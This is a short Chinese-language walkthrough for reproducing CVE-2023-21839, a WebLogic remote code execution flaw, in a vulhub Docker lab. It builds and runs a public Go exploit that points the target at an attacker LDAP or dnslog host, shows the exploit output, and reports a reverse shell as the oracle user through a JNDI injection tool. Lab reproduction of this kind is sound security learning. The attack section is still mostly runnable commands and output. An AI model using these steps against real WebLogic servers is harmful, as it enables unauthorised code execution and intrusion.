介绍
CVE-2023-21839
这是来自长亭xray的代码,该漏洞扫描已集成到新版xray中
vulhub 复现
1.docker-compose.yml:
version: '2'
services:
weblogic:
image: vulhub/weblogic:12.2.1.3-2018
ports:
- "7001:7001"
2.拉镜像启动:
docker-compose up -d
3.启动完成后访问http://your-ip:7001/console可以看到管理界面:
4.复现:
https://github.com/4ra1n/CVE-2023-21839
linux:
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
windows:
cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
┌──(root💀kali)-[~/CVE-2023-21839-master/cmd]
└─# ./CVE-2023-21839 -ip 192.168.179.153 -port 7001 -ldap ldap://yh5448.dnslog.cn/test
[*] your-ip: 192.168.179.153
[*] your-port: 7001
[*] your-ldap: ldap://yh5448.dnslog.cn/test
[*] weblogic 12
[*] id=2 LocateRequest
[*] id=3 RebindRequest
[*] id=4 RebindRequest
[*] id=5 LocateRequest
[*] id=6 ResolveRequest
[*] id=7 ResolveRequest
服务器启LDAP服务:
注入工具:
https://github.com/welk1n/JNDI-Injection-Exploit/
受害机执行:
监听反弹:
反弹成功,可以看到是个oracle权限